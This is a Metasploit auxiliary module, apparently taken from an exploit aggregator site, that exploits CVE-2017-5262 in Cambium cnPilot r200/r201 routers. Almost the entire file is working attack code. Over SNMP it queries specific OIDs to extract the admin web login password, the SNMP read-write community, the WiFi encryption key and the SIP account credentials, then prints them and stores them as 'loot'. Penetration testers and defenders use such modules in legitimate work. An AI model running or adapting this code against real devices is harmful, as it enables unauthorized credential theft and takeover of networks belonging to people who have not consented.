Share
## https://sploitus.com/exploit?id=PACKETSTORM:180918
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::SNMPClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Cambium cnPilot r200/r201 SNMP Enumeration',
'Description' => %{
Cambium cnPilot r200/r201 devices can be administered using SNMP. The
device configuration contains IP addresses, keys, passwords, & lots of juicy
information. This module exploits an access control flaw, which allows remotely
extracting sensitive information such as account passwords, WiFI PSK, & SIP
credentials via SNMP Read-Only (RO) community string.
},
'Author' => ['Karn Ganeshen'],
'References' =>
[
['CVE', '2017-5262'],
['URL', 'https://www.rapid7.com/blog/post/2017/12/19/r7-2017-25-cambium-epmp-and-cnpilot-multiple-vulnerabilities/']
],
'License' => MSF_LICENSE
)
register_options(
[
OptInt.new('TIMEOUT', [true, 'SNMP connection timeout', 10])
], self.class
)
end
def run_host(ip)
begin
snmp = connect_snmp
print_good("#{ip}, Connected.\n")
cnpilot_info = ''
# System Info
snmp_system_name = snmp.get_value('1.3.6.1.4.1.41010.1.1.1.0')
snmp_system_description = snmp.get_value('1.3.6.1.2.1.1.1.0')
cnpilot_system_uptime = snmp.get_value('1.3.6.1.2.1.1.3.0')
cnpilot_hardware_version = snmp.get_value('1.3.6.1.4.1.41010.1.1.4.0')
cnpilot_firmware_version = snmp.get_value('1.3.6.1.4.1.41010.1.1.5.0')
cnpilot_info << "SNMP System Name: #{snmp_system_name}" << "\n"
cnpilot_info << "SNMP System Description: #{snmp_system_description}" << "\n"
cnpilot_info << "Device UpTime: #{cnpilot_system_uptime}" << "\n"
cnpilot_info << "Hardware version: #{cnpilot_hardware_version}" << "\n"
cnpilot_info << "Firmware version: #{cnpilot_firmware_version}" << "\n"
# cnPilot Web Management Admin account Info
admin_username = snmp.get_value('1.3.6.1.4.1.41010.1.7.12.0')
admin_password = snmp.get_value('1.3.6.1.4.1.41010.1.7.13.0')
cnpilot_info << "Web Management Admin Login Name: #{admin_username}" << "\n"
cnpilot_info << "Web Management Admin Login Password: #{admin_password}" << "\n"
# SNMP Info
snmp_readonly_community = snmp.get_value('1.3.6.1.4.1.41010.1.9.2.0')
snmp_readwrite_community = snmp.get_value('1.3.6.1.4.1.41010.1.9.3.0')
snmp_trap_community = snmp.get_value('1.3.6.1.4.1.41010.1.9.4.0')
snmp_trap_entry_ip = snmp.get_value('1.3.6.1.4.1.41010.1.9.1.0')
cnpilot_info << "SNMP read-only community name: #{snmp_readonly_community}" << "\n"
cnpilot_info << "SNMP read-write community name: #{snmp_readwrite_community}" << "\n"
cnpilot_info << "SNMP Trap Community: #{snmp_trap_community}" << "\n"
cnpilot_info << "SNMP Trap Server IP Address: #{snmp_trap_entry_ip}" << "\n"
# WIFI Info
wireless_interface_ssid = snmp.get_value('1.3.6.1.4.1.41010.1.10.2.1.1.1.6.1')
wireless_interface_encryptionkey = snmp.get_value('1.3.6.1.4.1.41010.1.10.2.1.1.1.8.1')
wireless_interface_encryption = snmp.get_value('1.3.6.1.4.1.41010.1.10.2.1.1.1.7.1')
cnpilot_info << "Wireless Interface SSID: #{wireless_interface_ssid}" << "\n"
cnpilot_info << "Wireless Interface Encryption Key: #{wireless_interface_encryptionkey}" << "\n"
cnpilot_info << "Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): #{wireless_interface_encryption}" << "\n"
# SIP Account Info
sip_accountnumber = snmp.get_value('1.3.6.1.4.1.41010.1.5.1.1.11.1')
sip_accountpassword = snmp.get_value('1.3.6.1.4.1.41010.1.5.1.1.12.1')
cnpilot_info << "SIP Account Number: #{sip_accountnumber}" << "\n"
cnpilot_info << "SIP Account Password: #{sip_accountpassword}" << "\n"
# Printing captured info
print_status("Fetching System Information...\n")
print_good("SNMP System Name: #{snmp_system_name}")
print_good("SNMP System Description: #{snmp_system_description}")
print_good("Device UpTime: #{cnpilot_system_uptime}")
print_good("Hardware version: #{cnpilot_hardware_version}")
print_good("Firmware version: #{cnpilot_firmware_version}\n")
print_status("Fetching Login Account Information...\n")
print_good("Web Management Admin Login Name: #{admin_username}")
print_good("Web Management Admin Login Password: #{admin_password}\n")
print_status("Fetching SNMP Information...\n")
print_good("SNMP read-only community name: #{snmp_readonly_community}")
print_good("SNMP read-write community name: #{snmp_readwrite_community}")
print_good("SNMP Trap Community: #{snmp_trap_community}")
print_good("SNMP Trap Server IP Address: #{snmp_trap_entry_ip} \n")
print_status("Fetching WIFI Information...\n")
print_good("Wireless Interface SSID: #{wireless_interface_ssid}")
print_good("Wireless Interface Encryption Key: #{wireless_interface_encryptionkey}")
print_good("Wireless Interface Encryption (1 - Open mode, 2 - wpa2 mode, 3 - EAP-TTLS): #{wireless_interface_encryption} \n")
print_status("Fetching SIP Account Information...\n")
print_good("SIP Account Number: #{sip_accountnumber}")
print_good("SIP Account Password: #{sip_accountpassword}\n")
# Woot we got loot.
loot_name = 'snmp_loot'
loot_type = 'text/plain'
loot_filename = 'cnpilot_snmp_loot.txt'
loot_desc = 'Cambium cnPilot configuration data'
p = store_loot(loot_name, loot_type, datastore['RHOST'], cnpilot_info, loot_filename, loot_desc)
print_good("Cambium cnPilot SNMP loot saved at #{p} \n")
rescue SNMP::RequestTimeout
print_error("#{ip} SNMP request timeout.")
rescue Rex::ConnectionError
print_error("#{ip} Connection refused.")
rescue SNMP::InvalidIpAddress
print_error("#{ip} Invalid IP Address. Check it with 'snmpwalk tool'.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
elog(e)
ensure
disconnect_snmp
end
end
end